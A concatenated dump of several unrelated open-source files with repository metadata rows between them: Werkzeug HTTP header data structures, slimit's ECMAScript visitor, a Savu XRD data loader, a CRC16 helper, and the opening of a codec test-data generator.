self.on_update(self)
def as_set(self, preserve_casing=False):
"""Return the set as real python set type. When calling this, all
the items are converted to lowercase and the ordering is lost.
:param preserve_casing: if set to `True` the items in the set returned
will have the original case like in the
:class:`HeaderSet`, otherwise they will
be lowercase.
"""
if preserve_casing:
return set(self._headers)
return set(self._set)
def to_header(self):
"""Convert the header set into an HTTP header string."""
return ', '.join(map(quote_header_value, self._headers))
def __getitem__(self, idx):
return self._headers[idx]
def __delitem__(self, idx):
rv = self._headers.pop(idx)
self._set.remove(rv.lower())
if self.on_update is not None:
self.on_update(self)
def __setitem__(self, idx, value):
old = self._headers[idx]
self._set.remove(old.lower())
self._headers[idx] = value
self._set.add(value.lower())
if self.on_update is not None:
self.on_update(self)
def __contains__(self, header):
return header.lower() in self._set
def __len__(self):
return len(self._set)
def __iter__(self):
return iter(self._headers)
def __nonzero__(self):
return bool(self._set)
def __str__(self):
return self.to_header()
def __repr__(self):
return '%s(%r)' % (
self.__class__.__name__,
self._headers
)
class ETags(object):
"""A set that can be used to check if one etag is present in a collection
of etags.
"""
def __init__(self, strong_etags=None, weak_etags=None, star_tag=False):
self._strong = frozenset(not star_tag and strong_etags or ())
self._weak = frozenset(weak_etags or ())
self.star_tag = star_tag
def as_set(self, include_weak=False):
"""Convert the `ETags` object into a python set. Per default all the
weak etags are not part of this set."""
rv = set(self._strong)
if include_weak:
rv.update(self._weak)
return rv
def is_weak(self, etag):
"""Check if an etag is weak."""
return etag in self._weak
def contains_weak(self, etag):
"""Check if an etag is part of the set including weak and strong tags."""
return self.is_weak(etag) or self.contains(etag)
def contains(self, etag):
"""Check if an etag is part of the set ignoring weak tags.
It is also possible to use the ``in`` operator.
"""
if self.star_tag:
return True
return etag in self._strong
def contains_raw(self, etag):
"""When passed a quoted tag it will check if this tag is part of the
set. If the tag is weak it is checked against weak and strong tags,
otherwise strong only."""
etag, weak = unquote_etag(etag)
if weak:
return self.contains_weak(etag)
return self.contains(etag)
def to_header(self):
"""Convert the etags set into a HTTP header string."""
if self.star_tag:
return '*'
return ', '.join(
['"%s"' % x for x in self._strong] +
['w/"%s"' % x for x in self._weak]
)
def __call__(self, etag=None, data=None, include_weak=False):
if [etag, data].count(None) != 1:
raise TypeError('either tag or data required, but at least one')
if etag is None:
etag = generate_etag(data)
if include_weak:
if etag in self._weak:
return True
return etag in self._strong
def __nonzero__(self):
return bool(self.star_tag or self._strong or self._weak)
def __str__(self):
return self.to_header()
def __iter__(self):
return iter(self._strong)
def __contains__(self, etag):
return self.contains(etag)
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
class IfRange(object):
"""Very simple object that represents the `If-Range` header in parsed
form. It will either have neither a etag or date or one of either but
never both.
.. versionadded:: 0.7
"""
def __init__(self, etag=None, date=None):
#: The etag parsed and unquoted. Ranges always operate on strong
#: etags so the weakness information is not necessary.
self.etag = etag
#: The date in parsed format or `None`.
self.date = date
def to_header(self):
"""Converts the object back into an HTTP header."""
if self.date is not None:
return http_date(self.date)
if self.etag is not None:
return quote_etag(self.etag)
return ''
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
class Range(object):
"""Represents a range header. All the methods are only supporting bytes
as unit. It does store multiple ranges but :meth:`range_for_length` will
only work if only one range is provided.
.. versionadded:: 0.7
"""
def __init__(self, units, ranges):
#: The units of this range. Usually "bytes".
self.units = units
#: A list of ``(begin, end)`` tuples for the range header provided.
#: The ranges are non-inclusive.
self.ranges = ranges
def range_for_length(self, length):
"""If the range is for bytes, the length is not None and there is
exactly one range and it is satisfiable it returns a ``(start, stop)``
tuple, otherwise `None`.
"""
if self.units != 'bytes' or length is None or len(self.ranges) != 1:
return None
start, end = self.ranges[0]
if end is None:
end = length
if start < 0:
start += length
if is_byte_range_valid(start, end, length):
return start, min(end, length)
def make_content_range(self, length):
"""Creates a :class:`~werkzeug.datastructures.ContentRange` object
from the current range and given content length.
"""
rng = self.range_for_length(length)
if rng is not None:
return ContentRange(self.units, rng[0], rng[1], length)
def to_header(self):
"""Converts the object back into an HTTP header."""
ranges = []
for begin, end in self.ranges:
if end is None:
ranges.append(begin >= 0 and '%s-' % begin or str(begin))
else:
ranges.append('%s-%s' % (begin, end - 1))
return '%s=%s' % (self.units, ','.join(ranges))
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
class ContentRange(object):
"""Represents the content range header.
.. versionadded:: 0.7
"""
def __init__(self, units, start, stop, length=None, on_update=None):
assert is_byte_range_valid(start, stop, length), \
'Bad range provided'
self.on_update = on_update
self.set(start, stop, length, units)
def _callback_property(name):
def fget(self):
return getattr(self, name)
def fset(self, value):
setattr(self, name, value)
if self.on_update is not None:
self.on_update(self)
return property(fget, fset)
#: The units to use, usually "bytes"
units = _callback_property('_units')
#: The start point of the range or `None`.
start = _callback_property('_start')
#: The stop point of the range (non-inclusive) or `None`. Can only be
#: `None` if also start is `None`.
stop = _callback_property('_stop')
#: The length of the range or `None`.
length = _callback_property('_length')
def set(self, start, stop, length=None, units='bytes'):
"""Simple method to update the ranges."""
assert is_byte_range_valid(start, stop, length), \
'Bad range provided'
self._units = units
self._start = start
self._stop = stop
self._length = length
if self.on_update is not None:
self.on_update(self)
def unset(self):
"""Sets the units to `None` which indicates that the header should
no longer be used.
"""
self.set(None, None, units=None)
def to_header(self):
if self.units is None:
return ''
if self.length is None:
length = '*'
else:
length = self.length
if self.start is None:
return '%s */%s' % (self.units, length)
return '%s %s-%s/%s' % (
self.units,
self.start,
self.stop - 1,
length
)
def __nonzero__(self):
return self.units is not None
__bool__ = __nonzero__
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
class Authorization(ImmutableDictMixin, dict):
"""Represents an `Authorization` header sent by the client. You should
not create this kind of object yourself but use it when it's returned by
the `parse_authorization_header` function.
This object is a dict subclass and can be altered by setting dict items
but it should be considered immutable as it's returned by the client and
not meant for modifications.
.. versionchanged:: 0.5
This object became immutable.
"""
def __init__(self, auth_type, data=None):
dict.__init__(self, data or {})
self.type = auth_type
username = property(lambda x: x.get('username'), doc='''
The username transmitted. This is set for both basic and digest
auth all the time.''')
password = property(lambda x: x.get('password'), doc='''
When the authentication type is basic this is the password
transmitted by the client, else `None`.''')
realm = property(lambda x: x.get('realm'), doc='''
This is the server realm sent back for HTTP digest auth.''')
nonce = property(lambda x: x.get('nonce'), doc='''
The nonce the server sent for digest auth, sent back by the client.
A nonce should be unique for every 401 response for HTTP digest
auth.''')
uri = property(lambda x: x.get('uri'), doc='''
The URI from Request-URI of the Request-Line; duplicated because
proxies are allowed to change the Request-Line in transit. HTTP
digest auth only.''')
nc = property(lambda x: x.get('nc'), doc='''
The nonce count value transmitted by clients if a qop-header is
also transmitted. HTTP digest auth only.''')
cnonce = property(lambda x: x.get('cnonce'), doc='''
If the server sent a qop-header in the ``WWW-Authenticate``
header, the client has to provide this value for HTTP digest auth.
See the RFC for more details.''')
response = property(lambda x: x.get('response'), doc='''
A string of 32 hex digits computed as defined in RFC 2617, which
proves that the user knows a password. Digest auth only.''')
opaque = property(lambda x: x.get('opaque'), doc='''
The opaque header from the server returned unchanged by the client.
It is recommended that this string be base64 or hexadecimal data.
Digest auth only.''')
@property
def qop(self):
"""Indicates what "quality of protection" the client has applied to
the message for HTTP digest auth."""
def on_update(header_set):
if not header_set and 'qop' in self:
del self['qop']
elif header_set:
self['qop'] = header_set.to_header()
return parse_set_header(self.get('qop'), on_update)
class WWWAuthenticate(UpdateDictMixin, dict):
"""Provides simple access to `WWW-Authenticate` headers."""
#: list of keys that require quoting in the generated header
_require_quoting = frozenset(['domain', 'nonce', 'opaque', 'realm'])
def __init__(self, auth_type=None, values=None, on_update=None):
dict.__init__(self, values or ())
if auth_type:
self['__auth_type__'] = auth_type
self.on_update = on_update
def set_basic(self, realm='authentication required'):
"""Clear the auth info and enable basic auth."""
dict.clear(self)
dict.update(self, {'__auth_type__': 'basic', 'realm': realm})
if self.on_update:
self.on_update(self)
def set_digest(self, realm, nonce, qop=('auth',), opaque=None,
algorithm=None, stale=False):
"""Clear the auth info and enable digest auth."""
d = {
'__auth_type__': 'digest',
'realm': realm,
'nonce': nonce,
'qop': dump_header(qop)
}
if stale:
d['stale'] = 'TRUE'
if opaque is not None:
d['opaque'] = opaque
if algorithm is not None:
d['algorithm'] = algorithm
dict.clear(self)
dict.update(self, d)
if self.on_update:
self.on_update(self)
def to_header(self):
"""Convert the stored values into a WWW-Authenticate header."""
d = dict(self)
auth_type = d.pop('__auth_type__', None) or 'basic'
return '%s %s' % (auth_type.title(), ', '.join([
'%s=%s' % (key, quote_header_value(value,
allow_token=key not in self._require_quoting))
for key, value in iteritems(d)
]))
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (
self.__class__.__name__,
self.to_header()
)
def auth_property(name, doc=None):
"""A static helper function for subclasses to add extra authentication
system properties onto a class::
class FooAuthenticate(WWWAuthenticate):
special_realm = auth_property('special_realm')
For more information have a look at the sourcecode to see how the
regular properties (:attr:`realm` etc.) are implemented.
"""
def _set_value(self, value):
if value is None:
self.pop(name, None)
else:
self[name] = str(value)
return property(lambda x: x.get(name), _set_value, doc=doc)
def _set_property(name, doc=None):
def fget(self):
def on_update(header_set):
if not header_set and name in self:
del self[name]
elif header_set:
self[name] = header_set.to_header()
return parse_set_header(self.get(name), on_update)
return property(fget, doc=doc)
type = auth_property('__auth_type__', doc='''
The type of the auth mechanism. HTTP currently specifies
`Basic` and `Digest`.''')
realm = auth_property('realm', doc='''
A string to be displayed to users so they know which username and
password to use. This string should contain at least the name of
the host performing the authentication and might additionally
indicate the collection of users who might have access.''')
domain = _set_property('domain', doc='''
A list of URIs that define the protection space. If a URI is an
absolute path, it is relative to the canonical root URL of the
server being accessed.''')
nonce = auth_property('nonce', doc='''
A server-specified data string which should be uniquely generated
each time a 401 response is made. It is recommended that this
string be base64 or hexadecimal data.''')
opaque = auth_property('opaque', doc='''
A string of data, specified by the server, which should be returned
by the client unchanged in the Authorization header of subsequent
requests with URIs in the same protection space. It is recommended
that this string be base64 or hexadecimal data.''')
algorithm = auth_property('algorithm', doc='''
A string indicating a pair of algorithms used to produce the digest
and a checksum. If this is not present it is assumed to be "MD5".
If the algorithm is not understood, the challenge should be ignored
(and a different one used, if there is more than one).''')
qop = _set_property('qop', doc='''
A set of quality-of-privacy directives such as auth and auth-int.''')
def _get_stale(self):
val = self.get('stale')
if val is not None:
return val.lower() == 'true'
def _set_stale(self, value):
if value is None:
self.pop('stale', None)
else:
self['stale'] = value and 'TRUE' or 'FALSE'
stale = property(_get_stale, _set_stale, doc='''
A flag, indicating that the previous request from the client was
rejected because the nonce value was stale.''')
del _get_stale, _set_stale
# make auth_property a staticmethod so that subclasses of
# `WWWAuthenticate` can use it for new properties.
auth_property = staticmethod(auth_property)
del _set_property
class FileStorage(object):
"""The :class:`FileStorage` class is a thin wrapper over incoming files.
It is used by the request object to represent uploaded files. All the
attributes of the wrapper stream are proxied by the file storage so
it's possible to do ``storage.read()`` instead of the long form
``storage.stream.read()``.
"""
def __init__(self, stream=None, filename=None, name=None,
content_type=None, content_length=None,
headers=None):
self.name = name
self.stream = stream or _empty_stream
# if no filename is provided we can attempt to get the filename
# from the stream object passed. There we have to be careful to
# skip things like <fdopen>, <stderr> etc. Python marks these
# special filenames with angular brackets.
if filename is None:
filename = getattr(stream, 'name', None)
s = make_literal_wrapper(filename)
if filename and filename[0] == s('<') and filename[-1] == s('>'):
filename = None
# On Python 3 we want to make sure the filename is always unicode.
# This might not be if the name attribute is bytes due to the
# file being opened from the bytes API.
if not PY2 and isinstance(filename, bytes):
filename = filename.decode(sys.getfilesystemencoding(),
'replace')
self.filename = filename
if headers is None:
headers = Headers()
self.headers = headers
if content_type is not None:
headers['Content-Type'] = content_type
if content_length is not None:
headers['Content-Length'] = str(content_length)
def _parse_content_type(self):
if not hasattr(self, '_parsed_content_type'):
self._parsed_content_type = \
parse_options_header(self.content_type)
@property
def content_type(self):
"""The content-type sent in the header. Usually not available"""
return self.headers.get('content-type')
@property
def content_length(self):
"""The content-length sent in the header. Usually not available"""
return int(self.headers.get('content-length') or 0)
@property
def mimetype(self):
"""Like :attr:`content_type` but without parameters (eg, without
charset, type etc.). For example if the content
type is ``text/html; charset=utf-8`` the mimetype would be
``'text/html'``.
.. versionadded:: 0.7
"""
self._parse_content_type()
return self._parsed_content_type[0]
@property
def mimetype_params(self):
"""The mimetype parameters as dict. For example if the content
type is ``text/html; charset=utf-8`` the params would be
``{'charset': 'utf-8'}``.
.. versionadded:: 0.7
"""
self._parse_content_type()
return self._parsed_content_type[1]
def save(self, dst, buffer_size=16384):
"""Save the file to a destination path or file object. If the
destination is a file object you have to close it yourself after the
call. The buffer size is the number of bytes held in memory during
the copy process. It defaults to 16KB.
For secure file saving also have a look at :func:`secure_filename`.
:param dst: a filename or open file object the uploaded file
is saved to.
:param buffer_size: the size of the buffer. This works the same as
the `length` parameter of
:func:`shutil.copyfileobj`.
"""
from shutil import copyfileobj
close_dst = False
if isinstance(dst, string_types):
dst = open(dst, 'wb')
close_dst = True
try:
copyfileobj(self.stream, dst, buffer_size)
finally:
if close_dst:
dst.close()
def close(self):
"""Close the underlying file if possible."""
try:
self.stream.close()
except Exception:
pass
def __nonzero__(self):
return bool(self.filename)
def __getattr__(self, name):
return getattr(self.stream, name)
def __iter__(self):
return iter(self.readline, '')
def __repr__(self):
return '<%s: %r (%r)>' % (
self.__class__.__name__,
self.filename,
self.content_type
)
# circular dependencies
from werkzeug.http import dump_options_header, dump_header, generate_etag, \
quote_header_value, parse_set_header, unquote_etag, quote_etag, \
parse_options_header, http_date, is_byte_range_valid
from werkzeug import exceptions
| apache-2.0 | 2,562,384,758,529,963,500 | 31.940481 | 86 | 0.569142 | false |
moses-palmer/slimit | src/slimit/visitors/ecmavisitor.py | 1 | 12856 | ###############################################################################
#
# Copyright (c) 2011 Ruslan Spivak
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
__author__ = 'Ruslan Spivak <[email protected]>'
from slimit import ast
class ECMAVisitor(object):
def __init__(self):
self.indent_level = 0
def _make_indent(self):
return ' ' * self.indent_level
def visit(self, node):
method = 'visit_%s' % node.__class__.__name__
return getattr(self, method, self.generic_visit)(node)
def generic_visit(self, node):
return 'GEN: %r' % node
def visit_Program(self, node):
return '\n'.join(self.visit(child) for child in node)
def visit_Block(self, node):
s = '{\n'
self.indent_level += 2
s += '\n'.join(
self._make_indent() + self.visit(child) for child in node)
self.indent_level -= 2
s += '\n' + self._make_indent() + '}'
return s
def visit_VarStatement(self, node):
s = 'var %s;' % ', '.join(self.visit(child) for child in node)
return s
def visit_VarDecl(self, node):
output = []
output.append(self.visit(node.identifier))
if node.initializer is not None:
output.append(' = %s' % self.visit(node.initializer))
return ''.join(output)
def visit_Identifier(self, node):
return node.value
def visit_Assign(self, node):
if node.op == ':':
template = '%s%s %s'
else:
template = '%s %s %s'
if getattr(node, '_parens', False):
template = '(%s)' % template
return template % (
self.visit(node.left), node.op, self.visit(node.right))
def visit_GetPropAssign(self, node):
template = 'get %s() {\n%s\n%s}'
if getattr(node, '_parens', False):
template = '(%s)' % template
self.indent_level += 2
body = '\n'.join(
(self._make_indent() + self.visit(el))
for el in node.elements
)
self.indent_level -= 2
tail = self._make_indent()
return template % (self.visit(node.prop_name), body, tail)
def visit_SetPropAssign(self, node):
template = 'set %s(%s) {\n%s\n%s}'
if getattr(node, '_parens', False):
template = '(%s)' % template
if len(node.parameters) > 1:
raise SyntaxError(
'Setter functions must have one argument: %s' % node)
params = ','.join(self.visit(param) for param in node.parameters)
self.indent_level += 2
body = '\n'.join(
(self._make_indent() + self.visit(el))
for el in node.elements
)
self.indent_level -= 2
tail = self._make_indent()
return template % (self.visit(node.prop_name), params, body, tail)
def visit_Number(self, node):
return node.value
def visit_Comma(self, node):
s = '%s, %s' % (self.visit(node.left), self.visit(node.right))
if getattr(node, '_parens', False):
s = '(' + s + ')'
return s
def visit_EmptyStatement(self, node):
return node.value
def visit_If(self, node):
s = 'if ('
if node.predicate is not None:
s += self.visit(node.predicate)
s += ') '
s += self.visit(node.consequent)
if node.alternative is not None:
s += ' else '
s += self.visit(node.alternative)
return s
def visit_Boolean(self, node):
return node.value
def visit_For(self, node):
s = 'for ('
if node.init is not None:
s += self.visit(node.init)
if node.init is None:
s += ' ; '
elif isinstance(node.init, (ast.Assign, ast.Comma, ast.FunctionCall,
ast.UnaryOp, ast.Identifier, ast.BinOp,
ast.Conditional, ast.Regex, ast.NewExpr)):
s += '; '
else:
s += ' '
if node.cond is not None:
s += self.visit(node.cond)
s += '; '
if node.count is not None:
s += self.visit(node.count)
s += ') ' + self.visit(node.statement)
return s
def visit_ForIn(self, node):
if isinstance(node.item, ast.VarDecl):
template = 'for (var %s in %s) '
else:
template = 'for (%s in %s) '
s = template % (self.visit(node.item), self.visit(node.iterable))
s += self.visit(node.statement)
return s
def visit_BinOp(self, node):
if getattr(node, '_parens', False):
template = '(%s %s %s)'
else:
template = '%s %s %s'
return template % (
self.visit(node.left), node.op, self.visit(node.right))
def visit_UnaryOp(self, node):
s = self.visit(node.value)
if node.postfix:
s += node.op
elif node.op in ('delete', 'void', 'typeof'):
s = '%s %s' % (node.op, s)
else:
s = '%s%s' % (node.op, s)
if getattr(node, '_parens', False):
s = '(%s)' % s
return s
def visit_ExprStatement(self, node):
return '%s;' % self.visit(node.expr)
def visit_DoWhile(self, node):
s = 'do '
s += self.visit(node.statement)
s += ' while (%s);' % self.visit(node.predicate)
return s
def visit_While(self, node):
s = 'while (%s) ' % self.visit(node.predicate)
s += self.visit(node.statement)
return s
def visit_Null(self, node):
return 'null'
def visit_String(self, node):
return node.value
def visit_Continue(self, node):
if node.identifier is not None:
s = 'continue %s;' % self.visit_Identifier(node.identifier)
else:
s = 'continue;'
return s
def visit_Break(self, node):
if node.identifier is not None:
s = 'break %s;' % self.visit_Identifier(node.identifier)
else:
s = 'break;'
return s
def visit_Return(self, node):
if node.expr is None:
return 'return;'
else:
return 'return %s;' % self.visit(node.expr)
def visit_With(self, node):
s = 'with (%s) ' % self.visit(node.expr)
s += self.visit(node.statement)
return s
def visit_Label(self, node):
s = '%s: %s' % (
self.visit(node.identifier), self.visit(node.statement))
return s
def visit_Switch(self, node):
s = 'switch (%s) {\n' % self.visit(node.expr)
self.indent_level += 2
for case in node.cases:
s += self._make_indent() + self.visit_Case(case)
if node.default is not None:
s += self.visit_Default(node.default)
self.indent_level -= 2
s += self._make_indent() + '}'
return s
def visit_Case(self, node):
s = 'case %s:\n' % self.visit(node.expr)
self.indent_level += 2
elements = '\n'.join(self._make_indent() + self.visit(element)
for element in node.elements)
if elements:
s += elements + '\n'
self.indent_level -= 2
return s
def visit_Default(self, node):
s = self._make_indent() + 'default:\n'
self.indent_level += 2
s += '\n'.join(self._make_indent() + self.visit(element)
for element in node.elements)
if node.elements is not None:
s += '\n'
self.indent_level -= 2
return s
def visit_Throw(self, node):
s = 'throw %s;' % self.visit(node.expr)
return s
def visit_Debugger(self, node):
return '%s;' % node.value
def visit_Try(self, node):
s = 'try '
s += self.visit(node.statements)
if node.catch is not None:
s += ' ' + self.visit(node.catch)
if node.fin is not None:
s += ' ' + self.visit(node.fin)
return s
def visit_Catch(self, node):
s = 'catch (%s) %s' % (
self.visit(node.identifier), self.visit(node.elements))
return s
def visit_Finally(self, node):
s = 'finally %s' % self.visit(node.elements)
return s
def visit_FuncDecl(self, node):
self.indent_level += 2
elements = '\n'.join(self._make_indent() + self.visit(element)
for element in node.elements)
self.indent_level -= 2
s = 'function %s(%s) {\n%s' % (
self.visit(node.identifier),
', '.join(self.visit(param) for param in node.parameters),
elements,
)
s += '\n' + self._make_indent() + '}'
return s
def visit_FuncExpr(self, node):
self.indent_level += 2
elements = '\n'.join(self._make_indent() + self.visit(element)
for element in node.elements)
self.indent_level -= 2
ident = node.identifier
ident = '' if ident is None else ' %s' % self.visit(ident)
header = 'function%s(%s)'
if getattr(node, '_parens', False):
header = '(' + header
s = (header + ' {\n%s') % (
ident,
', '.join(self.visit(param) for param in node.parameters),
elements,
)
s += '\n' + self._make_indent() + '}'
if getattr(node, '_parens', False):
s += ')'
return s
def visit_Conditional(self, node):
if getattr(node, '_parens', False):
template = '(%s ? %s : %s)'
else:
template = '%s ? %s : %s'
s = template % (
self.visit(node.predicate),
self.visit(node.consequent), self.visit(node.alternative))
return s
def visit_Regex(self, node):
if getattr(node, '_parens', False):
return '(%s)' % node.value
else:
return node.value
def visit_NewExpr(self, node):
s = 'new %s(%s)' % (
self.visit(node.identifier),
', '.join(self.visit(arg) for arg in node.args)
)
return s
def visit_DotAccessor(self, node):
if getattr(node, '_parens', False):
template = '(%s.%s)'
else:
template = '%s.%s'
left = self.visit(node.node)
if isinstance(node.node, ast.Number):
left = '(%s)' % left
s = template % (left, self.visit(node.identifier))
return s
def visit_BracketAccessor(self, node):
s = '%s[%s]' % (self.visit(node.node), self.visit(node.expr))
return s
def visit_FunctionCall(self, node):
s = '%s(%s)' % (self.visit(node.identifier),
', '.join(self.visit(arg) for arg in node.args))
if getattr(node, '_parens', False):
s = '(' + s + ')'
return s
def visit_Object(self, node):
s = '{\n'
self.indent_level += 2
s += ',\n'.join(self._make_indent() + self.visit(prop)
for prop in node.properties)
self.indent_level -= 2
if node.properties:
s += '\n'
s += self._make_indent() + '}'
return s
def visit_Array(self, node):
s = '['
length = len(node.items) - 1
for index, item in enumerate(node.items):
if isinstance(item, ast.Elision):
s += ','
elif index != length:
s += self.visit(item) + ','
else:
s += self.visit(item)
s += ']'
return s
def visit_This(self, node):
return 'this'
| mit | 702,696,883,069,655,800 | 31.14 | 79 | 0.518979 | false |
FedeMPouzols/Savu | savu/plugins/loaders/multi_modal_loaders/i18_loaders/i18xrd_loader.py | 1 | 5937 | # Copyright 2014 Diamond Light Source Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module:: I18stxm_loader
:platform: Unix
:synopsis: A class for loading I18's stxm data
.. moduleauthor:: Aaron Parsons <[email protected]>
"""
from savu.plugins.loaders.multi_modal_loaders.base_i18_multi_modal_loader \
import BaseI18MultiModalLoader
from savu.data.data_structures.data_type import FabIO
from savu.plugins.utils import register_plugin
import h5py
import tempfile
import logging
import math
import os
import savu.test.test_utils as tu
@register_plugin
class I18xrdLoader(BaseI18MultiModalLoader):
"""
A class to load tomography data from an NXstxm file
:param data_path: Path to the folder containing the \
data. Default: 'Savu/test_data/data/image_test/tiffs'.
:param calibration_path: path to the calibration \
file. Default: "Savu/test_data/data/LaB6_calibration_output.nxs".
"""
def __init__(self, name='I18xrdLoader'):
super(I18xrdLoader, self).__init__(name)
def setup(self):
"""
Define the input nexus file
:param path: The full path of the NeXus file to load.
:type path: str
"""
data_obj = self.multi_modal_setup('xrd')
scan_pattern = self.parameters['scan_pattern']
frame_dim = range(len(scan_pattern))
shape = []
for pattern in self.parameters['scan_pattern']:
if pattern == 'rotation':
pattern = 'rotation_angle'
shape.append(len(data_obj.meta_data.get_meta_data(pattern)))
path = self.get_path('data_path')#self.parameters['data_path']
data_obj.data = FabIO(path, data_obj, frame_dim, shape=tuple(shape))
# dummy file
filename = path.split('/')[-1] + '.h5'
data_obj.backing_file = \
h5py.File(tempfile.mkdtemp() + '/' + filename, 'a')
data_obj.set_shape(data_obj.data.get_shape())
self.set_motors(data_obj, 'xrd')
self.add_patterns_based_on_acquisition(data_obj, 'xrd')
self.set_data_reduction_params(data_obj)
calibrationfile = h5py.File(self.get_path('calibration_path'), 'r')
# lets just make this all in meters and convert for pyfai in the base integrator
try:
logging.debug('testing the version of the calibration file')
det_str = 'entry1/instrument/detector'
mData = data_obj.meta_data
xpix = calibrationfile[det_str + '/detector_module/fast_pixel_direction'].value*1e-3 # in metres
mData.set_meta_data("x_pixel_size",xpix)
mData.set_meta_data("beam_center_x",
calibrationfile[det_str + '/beam_center_x'].value*1e-3) #in metres
mData.set_meta_data("beam_center_y",
calibrationfile[det_str + '/beam_center_y'].value*1e-3) # in metres
mData.set_meta_data("distance",
calibrationfile[det_str + '/distance'].value*1e-3) # in metres
mData.set_meta_data("incident_wavelength",
calibrationfile['/entry1/calibration_sample/beam'
'/incident_wavelength'].value*1e-10) # in metres
mData.set_meta_data("yaw", -calibrationfile[det_str + '/transformations/euler_b'].value)# in degrees
mData.set_meta_data("roll",calibrationfile[det_str + '/transformations/euler_c'].value-180.0)# in degrees
logging.debug('.... its the version in DAWN 2.0')
except KeyError:
try:
det_str = 'entry/instrument/detector'
mData = data_obj.meta_data
xpix = calibrationfile[det_str + '/x_pixel_size'].value * 1e-3
mData.set_meta_data("x_pixel_size", xpix) # in metres
mData.set_meta_data("beam_center_x",
calibrationfile[det_str + '/beam_center_x'].value*xpix)# in metres
mData.set_meta_data("beam_center_y",
calibrationfile[det_str + '/beam_center_y'].value*xpix) # in metres
mData.set_meta_data("distance",
calibrationfile[det_str + '/distance'].value*1e-3) # in metres
mData.set_meta_data("incident_wavelength",
calibrationfile['/entry/calibration_sample/beam'
'/incident_wavelength'].value*1e-10)# in metres
orien = calibrationfile[det_str + '/detector_orientation'][...].reshape((3, 3))
yaw = math.degrees(-math.atan2(orien[2, 0], orien[2, 2]))# in degrees
roll = math.degrees(-math.atan2(orien[0, 1], orien[1, 1]))# in degrees
mData.set_meta_data("yaw", -yaw)
mData.set_meta_data("roll", roll)
logging.debug('.... its the legacy version pre-DAWN 2.0')
except KeyError:
logging.warn("We don't know what type of calibration file this is")
self.set_data_reduction_params(data_obj)
calibrationfile.close()
def get_path(self,field):
path = self.parameters[field]
if path.split(os.sep)[0] == 'Savu':
path = tu.get_test_data_path(path.split('/test_data/data')[1])
return path
| gpl-3.0 | -7,426,081,832,613,310,000 | 42.654412 | 117 | 0.59744 | false |
zitouni/ieee_802-15-4_868-900 | examples/usrpN210/tools/crc16.py | 7 | 1996 | #!/usr/bin/env python
"""
Translation from a C code posted to a forum on the Internet.
@translator Thomas Schmid
"""
from array import array
def reflect(crc, bitnum):
# reflects the lower 'bitnum' bits of 'crc'
j=1
crcout=0
for b in range(bitnum):
i=1<<(bitnum-1-b)
if crc & i:
crcout |= j
j <<= 1
return crcout
def crcbitbybit(p):
# bit by bit algorithm with augmented zero bytes.
crc = 0
for i in range(len(p)):
c = p[i]
c = reflect(ord(c), 8)
j=0x80
for b in range(16):
bit = crc & 0x8000
crc <<= 1
crc &=0xFFFF
if c & j:
crc |= 1
if bit:
crc ^= 0x1021
j>>=1
if j == 0:
break
for i in range(16):
bit = crc & 0x8000
crc <<= 1
if bit:
crc ^= 0x1021
crc = reflect(crc, 16)
return crc
class CRC16(object):
""" Class interface, like the Python library's cryptographic
hash functions (which CRC's are definitely not.)
"""
def __init__(self, string=''):
self.val = 0
if string:
self.update(string)
def update(self, string):
self.val = crcbitbybit(string)
def checksum(self):
return chr(self.val >> 8) + chr(self.val & 0xff)
def intchecksum(self):
return self.val
def hexchecksum(self):
return '%04x' % self.val
def copy(self):
clone = CRC16()
clone.val = self.val
return clone
crc = CRC16()
#crc.update("123456789")
import struct
crc.update(struct.pack("20B", 0x1, 0x88, 0xe5, 0xff, 0xff, 0xff, 0xff, 0x10, 0x0, 0x10, 0x0, 0x1, 0x80, 0x80, 0xff, 0xff, 0x10, 0x0, 0x20, 0x0))
assert crc.checksum() == '\x02\x82'
| gpl-3.0 | 551,362,120,101,230,300 | 20.934066 | 144 | 0.480461 | false |
kelemetry/beacon | vendor/github.com/ugorji/go/codec/test.py | 107 | 4029 | #!/usr/bin/env python
# This will create golden files in a directory passed to it.
# A Test calls this internally to create the golden files
# So it can process them (so we don't have to checkin the files).
# Ensure msgpack-python and cbor are installed first, using:
# sudo apt-get install python-dev
# sudo apt-get install python-pip
# pip install --user msgpack-python msgpack-rpc-python cbor
# Ensure all "string" keys are utf strings (else encoded as bytes)
import cbor, msgpack, msgpackrpc, sys, os, threading
def get_test_data_list():
# get list with all primitive types, and a combo type
l0 = [
-8,
-1616,
-32323232,
-6464646464646464,
192,
1616,
32323232,
6464646464646464,
192,
-3232.0,
-6464646464.0,
3232.0,
6464.0,
6464646464.0,
False,
True,
u"null",
None,
u"some&day>some<day",
1328176922000002000,
u"",
-2206187877999998000,
u"bytestring",
270,
u"none",
-2013855847999995777,
#-6795364578871345152,
]
l1 = [
{ "true": True,
"false": False },
